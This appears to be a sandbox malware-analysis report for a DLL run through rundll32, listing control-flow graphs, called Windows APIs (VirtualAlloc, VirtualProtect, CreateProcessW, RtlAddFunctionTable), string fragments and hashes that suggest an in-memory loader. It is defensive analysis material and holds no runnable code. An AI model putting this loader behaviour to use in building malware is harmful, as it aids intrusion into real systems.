                                                                      control_flow_graph 0 230423b0000-230423b0460 call 230423b0aa8 * 2 VirtualAlloc 22 230423b048a-230423b0494 0->22 23 230423b0462-230423b0466 0->23 26 230423b049a-230423b049e 22->26 27 230423b0a91-230423b0aa6 22->27 24 230423b0468-230423b0488 23->24 24->22 24->24 26->27 28 230423b04a4-230423b04a8 26->28 28->27 29 230423b04ae-230423b04b2 28->29 29->27 30 230423b04b8-230423b04bf 29->30 30->27 31 230423b04c5-230423b04d2 30->31 31->27 32 230423b04d8-230423b04e1 31->32 32->27 33 230423b04e7-230423b04f4 32->33 33->27 34 230423b04fa-230423b0507 33->34 35 230423b0509-230423b0511 34->35 36 230423b0531-230423b0567 GetNativeSystemInfo 34->36 37 230423b0513-230423b0518 35->37 36->27 38 230423b056d-230423b0589 VirtualAlloc 36->38 39 230423b051a-230423b051f 37->39 40 230423b0521 37->40 41 230423b058b-230423b059e 38->41 42 230423b05a0-230423b05ac 38->42 43 230423b0523-230423b052f 39->43 40->43 41->42 44 230423b05af-230423b05b2 42->44 43->36 43->37 46 230423b05c1-230423b05db 44->46 47 230423b05b4-230423b05bf 44->47 48 230423b061b-230423b0622 46->48 49 230423b05dd-230423b05e2 46->49 47->44 51 230423b06db-230423b06e2 48->51 52 230423b0628-230423b062f 48->52 50 230423b05e4-230423b05ea 49->50 53 230423b060b-230423b0619 50->53 54 230423b05ec-230423b0609 50->54 56 230423b06e8-230423b06f9 51->56 57 230423b0864-230423b086b 51->57 52->51 55 230423b0635-230423b0642 52->55 53->48 53->50 54->53 54->54 55->51 60 230423b0648-230423b064f 55->60 61 230423b0702-230423b0705 56->61 58 230423b0871-230423b087f 57->58 59 230423b0917-230423b0929 57->59 64 230423b090e-230423b0911 58->64 62 230423b092f-230423b0937 59->62 63 230423b0a07-230423b0a1a 59->63 65 230423b0654-230423b0658 60->65 66 230423b06fb-230423b06ff 61->66 67 230423b0707-230423b070a 61->67 69 230423b093b-230423b093f 62->69 90 230423b0a1c-230423b0a27 63->90 91 230423b0a40-230423b0a4a 63->91 64->59 68 230423b0884-230423b08a9 64->68 70 230423b06c0-230423b06ca 65->70 66->61 71 230423b0788-230423b078e 67->71 72 230423b070c-230423b071d 67->72 95 230423b08ab-230423b08b1 68->95 96 230423b0907-230423b090c 68->96 75 230423b09ec-230423b09fa 69->75 76 230423b0945-230423b095a 69->76 73 230423b065a-230423b0669 70->73 74 230423b06cc-230423b06d2 70->74 78 230423b0794-230423b07a2 71->78 77 230423b071f-230423b0720 72->77 72->78 86 230423b066b-230423b0678 73->86 87 230423b067a-230423b067e 73->87 74->65 82 230423b06d4-230423b06d5 74->82 75->69 88 230423b0a00-230423b0a01 75->88 84 230423b097b-230423b097d 76->84 85 230423b095c-230423b095e 76->85 89 230423b0722-230423b0784 77->89 80 230423b07a8 78->80 81 230423b085d-230423b085e 78->81 92 230423b07ae-230423b07d4 80->92 81->57 82->51 100 230423b097f-230423b0981 84->100 101 230423b09a2-230423b09a4 84->101 97 230423b096e-230423b0979 85->97 98 230423b0960-230423b096c 85->98 99 230423b06bd-230423b06be 86->99 102 230423b068c-230423b0690 87->102 103 230423b0680-230423b068a 87->103 88->63 89->89 104 230423b0786 89->104 105 230423b0a38-230423b0a3e 90->105 93 230423b0a7b-230423b0a8e 91->93 94 230423b0a4c-230423b0a54 91->94 127 230423b07d6-230423b07d9 92->127 128 230423b0835-230423b0839 92->128 93->27 94->93 107 230423b0a56-230423b0a79 RtlAddFunctionTable 94->107 116 230423b08bb-230423b08c8 95->116 117 230423b08b3-230423b08b9 95->117 96->64 108 230423b09be-230423b09bf 97->108 98->108 99->70 109 230423b0989-230423b098b 100->109 110 230423b0983-230423b0987 100->110 114 230423b09ac-230423b09bb 101->114 115 230423b09a6-230423b09aa 101->115 112 230423b0692-230423b06a3 102->112 113 230423b06a5-230423b06a9 102->113 111 230423b06b6-230423b06ba 103->111 104->78 105->91 106 230423b0a29-230423b0a35 105->106 106->105 107->93 122 230423b09c5-230423b09cb 108->122 109->101 120 230423b098d-230423b098f 109->120 110->108 111->99 112->111 113->99 121 230423b06ab-230423b06b3 113->121 114->108 115->108 124 230423b08ca-230423b08d1 116->124 125 230423b08d3-230423b08e5 116->125 123 230423b08ea-230423b08fe 117->123 129 230423b0999-230423b09a0 120->129 130 230423b0991-230423b0997 120->130 121->111 131 230423b09d9-230423b09e9 VirtualProtect 122->131 132 230423b09cd-230423b09d3 122->132 123->96 138 230423b0900-230423b0905 123->138 124->124 124->125 125->123 133 230423b07db-230423b07e1 127->133 134 230423b07e3-230423b07f0 127->134 135 230423b083b 128->135 136 230423b0844-230423b0850 128->136 129->122 130->108 131->75 132->131 139 230423b0812-230423b082c 133->139 140 230423b07fb-230423b080d 134->140 141 230423b07f2-230423b07f9 134->141 135->136 136->92 142 230423b0856-230423b0857 136->142 138->95 139->128 144 230423b082e-230423b0833 139->144 140->139 141->140 141->141 142->81 144->127
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.447100170.00000230423B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230423B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_230423b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                      • API String ID: 394283112-2517549848
                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction ID: f5bcda5d924748d65e8d66526c93d536a49fd73dcea2af9d60bab82818ee0022
                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction Fuzzy Hash: 9C72FA30618B488BDB59DF18C8997B9BBF4FB98305F10462DE9CAC3251EB34E641CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180001BDC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 115processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 442 180001bdc-180001cab call 1800142a0 445 180001d21-180001d64 CreateProcessW 442->445 446 180001cad-180001d1b call 18000dd70 442->446 446->445
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.446272102.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: :}
                                                                      • API String ID: 963392458-2902022129
                                                                      • Opcode ID: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                      • Instruction ID: 26ea99709d6fc87808755d2915912d2f892c3b8ed2aa040ac50dc8635ae9c2e3
                                                                      • Opcode Fuzzy Hash: d4da30051582f0c34577a92f260795e531c0ce67ba31d10d3ee514360786ef98
                                                                      • Instruction Fuzzy Hash: EB415A7091C7888FD7B4DF58D4857AABBE0FBC8314F108A1EE48DD7255DB7498458B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:10.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:11
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 3264 28dc9d10000 3265 28dc9d10183 3264->3265 3266 28dc9d1043e VirtualAlloc 3265->3266 3270 28dc9d10462 3266->3270 3267 28dc9d10a7b 3268 28dc9d10531 GetNativeSystemInfo 3268->3267 3269 28dc9d1056d VirtualAlloc 3268->3269 3274 28dc9d1058b 3269->3274 3270->3267 3270->3268 3271 28dc9d10a00 3271->3267 3272 28dc9d10a56 RtlAddFunctionTable 3271->3272 3272->3267 3273 28dc9d109d9 VirtualProtect 3273->3274 3274->3271 3274->3273 3274->3274

                                                                      Executed Functions

                                                                      Function 0000028DC9D10000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 28dc9d10000-28dc9d10460 call 28dc9d10aa8 * 2 VirtualAlloc 22 28dc9d10462-28dc9d10466 0->22 23 28dc9d1048a-28dc9d10494 0->23 24 28dc9d10468-28dc9d10488 22->24 26 28dc9d10a91-28dc9d10aa6 23->26 27 28dc9d1049a-28dc9d1049e 23->27 24->23 24->24 27->26 28 28dc9d104a4-28dc9d104a8 27->28 28->26 29 28dc9d104ae-28dc9d104b2 28->29 29->26 30 28dc9d104b8-28dc9d104bf 29->30 30->26 31 28dc9d104c5-28dc9d104d2 30->31 31->26 32 28dc9d104d8-28dc9d104e1 31->32 32->26 33 28dc9d104e7-28dc9d104f4 32->33 33->26 34 28dc9d104fa-28dc9d10507 33->34 35 28dc9d10531-28dc9d10567 GetNativeSystemInfo 34->35 36 28dc9d10509-28dc9d10511 34->36 35->26 38 28dc9d1056d-28dc9d10589 VirtualAlloc 35->38 37 28dc9d10513-28dc9d10518 36->37 39 28dc9d10521 37->39 40 28dc9d1051a-28dc9d1051f 37->40 41 28dc9d105a0-28dc9d105ac 38->41 42 28dc9d1058b-28dc9d1059e 38->42 44 28dc9d10523-28dc9d1052f 39->44 40->44 43 28dc9d105af-28dc9d105b2 41->43 42->41 45 28dc9d105c1-28dc9d105db 43->45 46 28dc9d105b4-28dc9d105bf 43->46 44->35 44->37 48 28dc9d105dd-28dc9d105e2 45->48 49 28dc9d1061b-28dc9d10622 45->49 46->43 50 28dc9d105e4-28dc9d105ea 48->50 51 28dc9d10628-28dc9d1062f 49->51 52 28dc9d106db-28dc9d106e2 49->52 53 28dc9d105ec-28dc9d10609 50->53 54 28dc9d1060b-28dc9d10619 50->54 51->52 55 28dc9d10635-28dc9d10642 51->55 56 28dc9d10864-28dc9d1086b 52->56 57 28dc9d106e8-28dc9d106f9 52->57 53->53 53->54 54->49 54->50 55->52 60 28dc9d10648-28dc9d1064f 55->60 58 28dc9d10871-28dc9d1087f 56->58 59 28dc9d10917-28dc9d10929 56->59 61 28dc9d10702-28dc9d10705 57->61 64 28dc9d1090e-28dc9d10911 58->64 62 28dc9d1092f-28dc9d10937 59->62 63 28dc9d10a07-28dc9d10a1a 59->63 65 28dc9d10654-28dc9d10658 60->65 66 28dc9d10707-28dc9d1070a 61->66 67 28dc9d106fb-28dc9d106ff 61->67 69 28dc9d1093b-28dc9d1093f 62->69 81 28dc9d10a40-28dc9d10a4a 63->81 82 28dc9d10a1c-28dc9d10a27 63->82 64->59 68 28dc9d10884-28dc9d108a9 64->68 70 28dc9d106c0-28dc9d106ca 65->70 71 28dc9d10788-28dc9d1078e 66->71 72 28dc9d1070c-28dc9d1071d 66->72 67->61 101 28dc9d10907-28dc9d1090c 68->101 102 28dc9d108ab-28dc9d108b1 68->102 78 28dc9d10945-28dc9d1095a 69->78 79 28dc9d109ec-28dc9d109fa 69->79 76 28dc9d1065a-28dc9d10669 70->76 77 28dc9d106cc-28dc9d106d2 70->77 74 28dc9d10794-28dc9d107a2 71->74 73 28dc9d1071f-28dc9d10720 72->73 72->74 80 28dc9d10722-28dc9d10784 73->80 83 28dc9d1085d-28dc9d1085e 74->83 84 28dc9d107a8 74->84 89 28dc9d1067a-28dc9d1067e 76->89 90 28dc9d1066b-28dc9d10678 76->90 77->65 85 28dc9d106d4-28dc9d106d5 77->85 87 28dc9d1095c-28dc9d1095e 78->87 88 28dc9d1097b-28dc9d1097d 78->88 79->69 91 28dc9d10a00-28dc9d10a01 79->91 80->80 96 28dc9d10786 80->96 99 28dc9d10a4c-28dc9d10a54 81->99 100 28dc9d10a7b-28dc9d10a8e 81->100 97 28dc9d10a38-28dc9d10a3e 82->97 83->56 98 28dc9d107ae-28dc9d107d4 84->98 85->52 103 28dc9d1096e-28dc9d10979 87->103 104 28dc9d10960-28dc9d1096c 87->104 92 28dc9d1097f-28dc9d10981 88->92 93 28dc9d109a2-28dc9d109a4 88->93 94 28dc9d10680-28dc9d1068a 89->94 95 28dc9d1068c-28dc9d10690 89->95 105 28dc9d106bd-28dc9d106be 90->105 91->63 109 28dc9d10983-28dc9d10987 92->109 110 28dc9d10989-28dc9d1098b 92->110 114 28dc9d109a6-28dc9d109aa 93->114 115 28dc9d109ac-28dc9d109bb 93->115 111 28dc9d106b6-28dc9d106ba 94->111 112 28dc9d10692-28dc9d106a3 95->112 113 28dc9d106a5-28dc9d106a9 95->113 96->74 97->81 106 28dc9d10a29-28dc9d10a35 97->106 127 28dc9d107d6-28dc9d107d9 98->127 128 28dc9d10835-28dc9d10839 98->128 99->100 107 28dc9d10a56-28dc9d10a79 RtlAddFunctionTable 99->107 100->26 101->64 116 28dc9d108b3-28dc9d108b9 102->116 117 28dc9d108bb-28dc9d108c8 102->117 108 28dc9d109be-28dc9d109bf 103->108 104->108 105->70 106->97 107->100 124 28dc9d109c5-28dc9d109cb 108->124 109->108 110->93 122 28dc9d1098d-28dc9d1098f 110->122 111->105 112->111 113->105 123 28dc9d106ab-28dc9d106b3 113->123 114->108 115->108 125 28dc9d108ea-28dc9d108fe 116->125 118 28dc9d108d3-28dc9d108e5 117->118 119 28dc9d108ca-28dc9d108d1 117->119 118->125 119->118 119->119 129 28dc9d10991-28dc9d10997 122->129 130 28dc9d10999-28dc9d109a0 122->130 123->111 131 28dc9d109cd-28dc9d109d3 124->131 132 28dc9d109d9-28dc9d109e9 VirtualProtect 124->132 125->101 138 28dc9d10900-28dc9d10905 125->138 134 28dc9d107e3-28dc9d107f0 127->134 135 28dc9d107db-28dc9d107e1 127->135 136 28dc9d10844-28dc9d10850 128->136 137 28dc9d1083b 128->137 129->108 130->124 131->132 132->79 140 28dc9d107f2-28dc9d107f9 134->140 141 28dc9d107fb-28dc9d1080d 134->141 139 28dc9d10812-28dc9d1082c 135->139 136->98 142 28dc9d10856-28dc9d10857 136->142 137->136 138->102 139->128 144 28dc9d1082e-28dc9d10833 139->144 140->140 140->141 141->139 142->83 144->127
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.444089664.0000028DC9D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000028DC9D10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_28dc9d10000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                      • API String ID: 394283112-2517549848
                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction ID: 7cd35fe6a21c11b9ee20d057a10bd13971793a2dfa5c4dbb7e75c065fae65a47
                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                      • Instruction Fuzzy Hash: 98722A35519B48CBDB58EF18C8897B9B7E0FB94315F10822EE88AD3282DF34D545CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                      • API String ID: 0-464535774
                                                                      • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                      • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                      • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                      • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180010FF4 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                      • API String ID: 0-3528011396
                                                                      • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                      • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                      • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                      • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 229 180021bdf-180021bee 221->229 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 230 1800219e4-1800219ee 227->230 231 180021681-180021686 227->231 229->217 230->217 233 1800219d5-1800219df call 18001dfb4 231->233 234 18002168c-180021691 231->234 233->217 235 180021697-18002169c 234->235 236 18002190c-1800219a5 call 18000abac 234->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 247 1800219b2-1800219c6 243->247 248 1800219cb-1800219d0 243->248 244->224 247->217 248->217
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $&.+$)O$.pN$F>9$t(/
                                                                      • API String ID: 0-3036092626
                                                                      • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                      • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                      • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                      • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 262 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->262 263 18000cca0-18000cca5 256->263 290 18000cfb4-18000d00a call 1800194a4 257->290 264 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->264 265 18000c64e-18000c653 258->265 293 18000cc28-18000cc85 call 1800194a4 259->293 304 18000cedc-18000cf26 call 1800194a4 262->304 266 18000cd35-18000cdce call 18000703c call 18001c32c 263->266 267 18000ccab-18000ccb0 263->267 264->253 269 18000c9c1-18000ca52 call 18002870c call 18001c32c 265->269 270 18000c659-18000c65e 265->270 309 18000cdd3-18000ce2e call 1800194a4 266->309 274 18000ccb6-18000cd30 call 180021434 267->274 275 18000d00f-18000d014 267->275 312 18000ca57-18000caa0 call 1800194a4 269->312 277 18000c664-18000c669 270->277 278 18000c8bb-18000c963 call 180002610 call 18001c32c 270->278 274->253 275->253 291 18000d01a-18000d020 275->291 286 18000c7b2-18000c85a call 180019618 call 18001c32c 277->286 287 18000c66f-18000c674 277->287 317 18000c968-18000c9bc call 1800194a4 278->317 324 18000c85f-18000c8b6 call 1800194a4 286->324 287->275 297 18000c67a-18000c73d call 180002178 call 18001c32c 287->297 290->275 293->253 326 18000c742-18000c7ad call 1800194a4 297->326 304->253 309->253 312->253 317->253 324->253 326->253
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +#;)$K'$sf$w\H
                                                                      • API String ID: 0-1051058546
                                                                      • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                      • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                      • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                      • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <4P$<8$<w.
                                                                      • API String ID: 0-1030867500
                                                                      • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                      • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                      • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                      • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0000000180009100 Relevance: .1, Instructions: 125COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                      • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                      • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                      • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                      • API String ID: 0-2447245168
                                                                      • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                      • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                      • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                      • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 581 1800061ab-1800061b0 570->581 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 577 180005a25-180005a2a 572->577 578 180005da6-180005fb1 call 1800093f0 572->578 573->569 579 1800061bb-18000625a call 180001b1c 577->579 580 180005a30-180005a35 577->580 593 180005fc3-180005fc8 578->593 594 180005fb3-180005fbe 578->594 587 18000625f-180006271 579->587 584 180005a3b-180005a40 580->584 585 180005d7e-180005d8c 580->585 586 1800061b6 581->586 581->587 590 180005a46-180005a4b 584->590 591 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 584->591 592 180005d92-180005d96 585->592 586->569 595 180005a51-180005a56 590->595 596 180005ad8-180005b68 call 18000abac 590->596 591->569 597 180005d98-180005da1 592->597 598 180005d8e-180005d8f 592->598 593->569 594->569 595->581 600 180005a5c-180005ad3 call 180007958 595->600 596->587 607 180005b6e-180005b73 596->607 597->569 598->592 600->569 607->569
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_180001000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
